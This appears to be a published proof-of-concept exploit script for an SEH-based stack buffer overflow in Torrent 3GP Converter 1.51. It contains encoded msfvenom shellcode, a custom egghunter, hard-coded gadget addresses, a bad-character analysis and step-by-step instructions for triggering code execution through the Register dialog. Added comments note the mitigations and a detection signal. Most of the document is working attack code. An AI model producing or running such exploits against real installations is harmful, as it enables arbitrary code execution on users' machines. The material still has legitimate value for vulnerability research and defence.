


Torrent 3GP Converter 1.51 – Stack Overflow (SEH)



# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Author: boku
# Date: 2020-01-24
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
# Version: Torrent 3GP Converter Version 1.51 Build 116
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
#  1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
#  2) run python script & open created 'crash.txt' file
#  3) select-all > copy-all
#  4) in app, click 'Register' on the bottom
#  5) in 'Name:' textbox enter 'a'
#  6) in 'Code:' textbox paste buffer
#  7) click 'OK', calculator will open & app will crash

#!/usr/bin/python
#
# Proof-of-concept generator. The script builds one oversized string in memory
# and writes it to crash.txt; the "Recreate" steps in the header paste that
# file into the 'Code:' field of the Register dialog. Nothing here talks to the
# target application itself - the only side effect is the file write at the
# bottom.
#
# Defender notes (taken from the author's own annotations below):
#  - The technique relies on bsvideoconverter.exe being loaded with
#    "ASLR: False, Rebase: False, SafeSEH: False" and with RWX pages
#    ({PAGE_EXECUTE_READWRITE}), per the address annotations next to the
#    'call ecx' and 'pop/pop/ret' gadgets. Linking the module with /SAFESEH,
#    /DYNAMICBASE and /NXCOMPAT, and validating the length of the registration
#    code before it is processed, removes those preconditions.
#  - The payload is msfvenom windows/exec CMD='calc' (see the msfvenom comment
#    below), so a successful trigger looks like calc.exe spawned as a child of
#    bsvideoconverter.exe - a simple process-tree signal for this PoC.
#  - This is a Python 2 script (see the shebang): `shellcode` is a bytes
#    literal and every other piece is a str; they only concatenate into a
#    single string under Python 2.

# Bad Chars 
# x00 => x20 # x0d Truncates buffer # x2d Gets ejected from buffer
# x61-x6f => x41-x4f / ASCII Lower => ASCII Upper
# x70-x7a => x50-x5a / ASCII Lower => ASCII Upper
# x9a => x8a # x9c => x8c # x9e => x8e
# xe0-xef => xc0-xcf # xf0-xf6 => xd0-xd6
# xf8-xfe => xd8-xde # xff => x9f
# badChars='x00x0dx2dx61x62x6364x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax9ax9cx9exe0xe1xe2xe3xe4xe5xe6xeexe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf8xf9xfaxfbxfcxfdxfexff'
# Max shellcode size is 2384  bytes
# - First 2384 bytes of our buffer is left unmangled on the stack
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
# x86/alpha_upper chosen with final size 447
# Payload size: 447 bytes
## msfvenom x86/alpha_uppers GetPC Routine ##
#  [!] Does not work because of the bad chars!
# Manually replaced with a working version of GetPC for this exploit
# (the original encoder stub is shown in the comments next to each replacement)
# 89E5            mov ebp, esp
shellcode = b'x54x5D' # push esp # pop ebp
# DBCD            fcmovne st, st(5)
shellcode += b'x89xCF' # mov edi, ecx
# D975 F4         fstenv [ebp-C]
shellcode += b'x47x47x90' # inc edi # inc edi # nop
# 5F              pop edi  
shellcode += b'x90' # nop
# Remainder of the msfvenom alpha_upper output, unchanged.
shellcode += b"x57x59x49"
shellcode += b"x49x49x49x43x43x43x43x43x43x51x5a"
shellcode += b"x56x54x58x33x30x56x58x34x41x50x30"
shellcode += b"x41x33x48x48x30x41x30x30x41x42x41"
shellcode += b"x41x42x54x41x41x51x32x41x42x32x42"
shellcode += b"x42x30x42x42x58x50x38x41x43x4ax4a"
shellcode += b"x49x4bx4cx5ax48x4dx52x55x50x55x50"
shellcode += b"x33x30x43x50x4bx39x4bx55x46x51x59"
shellcode += b"x50x42x44x4cx4bx30x50x36x50x4cx4b"
shellcode += b"x56x32x34x4cx4cx4bx56x32x42x34x4c"
shellcode += b"x4bx34x32x31x38x34x4fx4ex57x50x4a"
shellcode += b"x37x56x30x31x4bx4fx4ex4cx47x4cx35"
shellcode += b"x31x43x4cx34x42x56x4cx47x50x39x51"
shellcode += b"x58x4fx34x4dx45x51x59x57x4ax42x4a"
shellcode += b"x52x46x32x56x37x4cx4bx31x42x44x50"
shellcode += b"x4cx4bx50x4ax47x4cx4cx4bx50x4cx42"
shellcode += b"x31x33x48x4bx53x51x58x45x51x4ex31"
shellcode += b"x30x51x4cx4bx31x49x51x30x55x51x59"
shellcode += b"x43x4cx4bx30x49x42x38x4bx53x37x4a"
shellcode += b"x57x39x4cx4bx47x44x4cx4bx53x31x59"
shellcode += b"x46x46x51x4bx4fx4ex4cx39x51x38x4f"
shellcode += b"x34x4dx35x51x4fx37x57x48x4dx30x53"
shellcode += b"x45x4cx36x45x53x53x4dx4ax58x37x4b"
shellcode += b"x43x4dx46x44x33x45x4ax44x56x38x4c"
shellcode += b"x4bx36x38x47x54x45x51x38x53x32x46"
shellcode += b"x4cx4bx44x4cx30x4bx4cx4bx50x58x45"
shellcode += b"x4cx53x31x59x43x4cx4bx45x54x4cx4b"
shellcode += b"x33x31x38x50x4dx59x57x34x57x54x36"
shellcode += b"x44x31x4bx51x4bx33x51x36x39x31x4a"
shellcode += b"x50x51x4bx4fx4dx30x51x4fx31x4fx50"
shellcode += b"x5ax4cx4bx45x42x5ax4bx4cx4dx51x4d"
shellcode += b"x52x4ax35x51x4cx4dx4cx45x48x32x35"
shellcode += b"x50x43x30x33x30x46x30x43x58x46x51"
shellcode += b"x4cx4bx42x4fx4dx57x4bx4fx59x45x4f"
shellcode += b"x4bx5ax50x38x35x39x32x31x46x53x58"
shellcode += b"x4ex46x5ax35x4fx4dx4dx4dx4bx4fx58"
shellcode += b"x55x47x4cx35x56x43x4cx35x5ax4bx30"
shellcode += b"x4bx4bx4dx30x42x55x44x45x4fx4bx37"
shellcode += b"x37x45x43x54x32x32x4fx42x4ax55x50"
shellcode += b"x36x33x4bx4fx58x55x45x33x55x31x32"
shellcode += b"x4cx43x53x35x50x41x41"
# Stack EggHunter for fun & profit 
# The tag is written twice in front of the shellcode; the hunter searches the
# stack for the doubled tag (0x424f4b55 below) and then transfers to whatever
# follows it.
egg = 'BOKU'
hunterOS = 'x41'*(2784-len(egg+egg+shellcode))
# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
hunter  = 'x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
hunter  += 'x5B' # pop ebx / EBX=PC
hunter  += 'x80x43x29x20'     #   add byte [ebx+41], 0x20 / 20+55=7F=jnz
hunter  += 'x80x43x33x20'     #   add byte [ebx+51], 0x20 / 20+55=7F=jnz
hunter  += 'xB8x42x4Fx4Bx55' # mov eax,0x424f4b55
hunter  += 'x54' # push esp
hunter  += 'x59' # pop ecx
hunter  += 'x90'*18 # nop fillers for jnz short -7 loop
hunter  += 'x49' # dec ecx
hunter  += 'x3Bx01' # cmp eax, [ecx]
hunter  += 'x55xF7' # 75F7 = jnz short -7 / Have to avoid bad xF- chars
hunter  += 'x51' # push ecx
hunter  += 'x5a' # pop edx
hunter  += 'x4a'*4 # dec edx * 4 / check if second egg matches
hunter  += 'x3Bx02' # cmp eax, [edx]
hunter  += 'x55xDF' # jnz short -31 / back to the loop - avoid bad chars
hunter  += 'x83xc14' # add ecx, 0x4 / start of shellcode after eggs
hunter  += 'x31xd2' # xor edx,edx
hunter  += 'x52' # push edx
hunter  += 'xC6x44x24x02x4B' # mov byte [esp+0x2],0x4b
hunter  += 'xC6x44x24x01x44' # mov byte [esp+0x1],0x44
hunter  += 'xC6x04x24x39'     # mov byte [esp],0x39
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
#   ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:Program FilesTorrent 3GP Converterbsvideoconverter.exe)
#   ^ the fixed, non-rebased image base is what makes a hard-coded address usable here.
hunter  += 'xc3' # ret
huntRmdr = 'x41'*(88-len(hunter))   # pad the hunter out to its 88-byte slot
nsehOS   = 'x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
nSEH     = 'x83xC4x04xC3'     # add esp,byte +0x4 # ret
# 3-byte SEH overwrite using the truncating Null byte
SEH      = 'x0fx47x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] 
         # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE} 

# Buffer layout, front to back: tag, tag, shellcode, padding up to offset 2784,
# 88-byte hunter slot, NOP padding up to offset 4500, 4-byte nSEH, 3-byte SEH.
payload  = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH

# Write the buffer to crash.txt in the current directory. The bare except
# swallows every exception type (permission errors, a read-only directory, a
# Python 3 TypeError from the bytes/str mix) and reports only the generic
# message below, so a failed run gives no hint of the cause.
try:
    f=open("crash.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
            








